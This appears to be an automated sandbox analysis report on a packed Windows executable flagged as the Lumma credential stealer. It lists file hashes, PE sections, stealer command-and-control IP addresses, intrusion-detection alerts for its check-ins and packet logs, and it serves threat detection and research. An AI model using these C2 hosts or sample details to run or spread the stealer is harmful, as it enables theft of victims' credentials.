                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:b0ho5YYSdo.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:26b5af1cfc3efc73b6d9be8f11412a9b.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@6/6
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 5
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target b0ho5YYSdo.exe, PID 7412 because there are no executed function
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              06:49:48API Interceptor2086596x Sleep call for process: b0ho5YYSdo.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              104.21.74.40https://new.express.adobe.com/webpage/sAiKE1YBfM7xeGet hashmaliciousHTMLPhisherBrowse
                                                                                                172.67.143.157sCmJY5L067.exeGet hashmaliciousSystemBCBrowse
                                                                                                  172.67.206.214https://wikimho.com/us/q/superuser/829636Get hashmaliciousUnknownBrowse
                                                                                                    104.21.11.101ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                        TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                          COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                              https://out.novastellz.de/i45/Get hashmaliciousUnknownBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                mindhandru.buzzr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                s-part-0035.t-0009.t-msedge.netTTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                • 13.107.246.63
                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 13.107.246.63
                                                                                                                blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                • 13.107.246.63
                                                                                                                https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 13.107.246.63
                                                                                                                New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 13.107.246.63
                                                                                                                aYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 13.107.246.63
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                • 172.67.150.49
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.66.86
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.157.254
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                CLOUDFLARENETUSr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                • 172.67.150.49
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.66.86
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.157.254
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                CLOUDFLARENETUSr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                • 172.67.150.49
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.66.86
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.157.254
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                CLOUDFLARENETUSr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                • 172.67.150.49
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.66.86
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.157.254
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.74.40
                                                                                                                • 104.21.63.217
                                                                                                                • 172.67.143.157
                                                                                                                • 172.67.206.214
                                                                                                                • 104.21.11.101
                                                                                                                • 104.21.66.113
                                                                                                                No context
                                                                                                                No created / dropped files found
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.949926479413592
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:b0ho5YYSdo.exe
                                                                                                                File size:1'834'496 bytes
                                                                                                                MD5:26b5af1cfc3efc73b6d9be8f11412a9b
                                                                                                                SHA1:669f03be44e22fa6842b05a1aaa9b08870e5c73a
                                                                                                                SHA256:0d637271932e343f729bf09cbcc63204c681bef4d60e72767bed5f281203ce76
                                                                                                                SHA512:17c4e9293becb84482caaa74d0698cde0897ad85c409bac0ca8ea15131332b81e6dd17bbff300c31498d4877c898a4704b1b4d00488c9575ed44e12cc8937efb
                                                                                                                SSDEEP:49152:+V33fSaOz1yiYlzDfekkAIIVPY6981r2nZp8oUfh:o3KtS3ZR/98gnZm
                                                                                                                TLSH:E38533A204F39F4FE71453FE56E1A6887746352E16950F30B60F93D40667EE263AEC48
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................H...........@.................................Y@..m..
                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                Entrypoint:0x88a000
                                                                                                                Entrypoint Section:.taggant
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                Instruction
                                                                                                                jmp 00007F4200F42D1Ah
                                                                                                                paddusb mm3, qword ptr [ebx]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add cl, ch
                                                                                                                add byte ptr [eax], ah
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [ebx], cl
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax+00h], ah
                                                                                                                add byte ptr [eax], al
                                                                                                                inc esp
                                                                                                                nop
                                                                                                                mov cl, 0Fh
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                or ecx, dword ptr [edx]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add dword ptr [eax+00000000h], eax
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                push es
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                0x10000x520000x264005d48af2468e72405ac4de70258c7a10cFalse0.9996553308823529data7.989782766270618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                0x550000x29e0000x2007c65210b5839db3cb4f4a31787b64685unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                unozmjur0x2f30000x1960000x195e007f49f7aa98d98977958bcea86c6f742cFalse0.9951499701647675data7.955220632675739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                stsqxyhb0x4890000x10000x400d8a2b23dece581cd8664eb37934deec5False0.7060546875data5.649020585788196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .taggant0x48a0000x30000x2200300e2e0e0a3d235b78a2ab94861f023bFalse0.07605698529411764DOS executable (COM)0.8195228507623445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                DLLImport
                                                                                                                kernel32.dlllstrcpy

                                                                                                                Download Network PCAP: filteredfull

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-26T12:49:21.415722+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712104.21.11.101443TCP
                                                                                                                2024-12-26T12:49:51.925865+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949712104.21.11.101443TCP
                                                                                                                2024-12-26T12:49:51.925865+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949712104.21.11.101443TCP
                                                                                                                2024-12-26T12:49:53.664897+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949783104.21.74.40443TCP
                                                                                                                2024-12-26T12:50:03.925898+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949783104.21.74.40443TCP
                                                                                                                2024-12-26T12:50:03.925898+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949783104.21.74.40443TCP
                                                                                                                2024-12-26T12:50:05.565652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949808172.67.143.157443TCP
                                                                                                                2024-12-26T12:50:11.934577+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949808172.67.143.157443TCP
                                                                                                                2024-12-26T12:50:11.934577+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949808172.67.143.157443TCP
                                                                                                                2024-12-26T12:50:13.569469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949825104.21.63.217443TCP
                                                                                                                2024-12-26T12:50:15.926388+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949825104.21.63.217443TCP
                                                                                                                2024-12-26T12:50:15.926388+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949825104.21.63.217443TCP
                                                                                                                2024-12-26T12:50:17.599579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949836172.67.206.214443TCP
                                                                                                                2024-12-26T12:50:19.926101+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949836172.67.206.214443TCP
                                                                                                                2024-12-26T12:50:19.926101+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949836172.67.206.214443TCP
                                                                                                                2024-12-26T12:50:21.575761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949847104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:29.506820+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949847104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:29.506820+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949847104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:30.884302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949868104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:45.975033+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949868104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:45.975033+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949868104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:47.836398+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949904104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:49.514459+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949910104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:51.307799+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949913104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:53.499492+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949919104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:55.997442+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949923104.21.66.113443TCP
                                                                                                                2024-12-26T12:50:57.347355+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949929104.21.66.113443TCP
                                                                                                                • Total Packets: 117
                                                                                                                • 443 (HTTPS)
                                                                                                                • 53 (DNS)
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 26, 2024 12:49:20.101890087 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:20.101984978 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:20.102080107 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:20.105021954 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:20.105058908 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:21.415633917 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:21.415721893 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:21.419235945 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:21.419248104 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:21.419509888 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:21.468556881 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:21.468584061 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:21.468693018 CET44349712104.21.11.101192.168.2.9
                                                                                                                Dec 26, 2024 12:49:51.925491095 CET49712443192.168.2.9104.21.11.101
                                                                                                                Dec 26, 2024 12:49:52.336935043 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:52.336977005 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:49:52.337038994 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:52.337466002 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:52.337480068 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:49:53.664841890 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:49:53.664896965 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:53.691842079 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:53.691867113 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:49:53.692904949 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:49:53.699060917 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:53.699095011 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:49:53.699235916 CET44349783104.21.74.40192.168.2.9
                                                                                                                Dec 26, 2024 12:50:03.925514936 CET49783443192.168.2.9104.21.74.40
                                                                                                                Dec 26, 2024 12:50:04.246772051 CET49808443192.168.2.9172.67.143.157
                                                                                                                Dec 26, 2024 12:50:04.246829033 CET44349808172.67.143.157192.168.2.9
                                                                                                                Dec 26, 2024 12:50:04.246897936 CET49808443192.168.2.9172.67.143.157
